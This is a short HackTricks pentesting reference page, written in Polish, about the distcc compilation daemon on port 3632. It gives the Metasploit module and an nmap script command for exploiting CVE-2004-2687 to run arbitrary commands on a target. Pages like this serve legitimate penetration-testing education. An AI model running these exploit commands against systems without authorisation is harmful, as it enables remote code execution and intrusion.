hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.3 KiB

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Podstawowe informacje

Distcc to narzędzie, które poprawia proces kompilacji poprzez wykorzystanie nieużywanej mocy obliczeniowej innych komputerów w sieci. Gdy distcc jest skonfigurowany na maszynie, ta maszyna jest w stanie rozdzielać swoje zadania kompilacji do innego systemu. Ten system odbierający musi mieć uruchomiony demon distccd i musi mieć zainstalowany kompatybilny kompilator, aby przetworzyć wysłany kod.

Domyślny port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Wykorzystanie

Sprawdź, czy jest podatny na CVE-2004-2687, aby wykonać dowolny kod:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Nie sądzę, żeby shodan wykrywał tę usługę.

Resources

Post created by Álex B (@r1p)

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}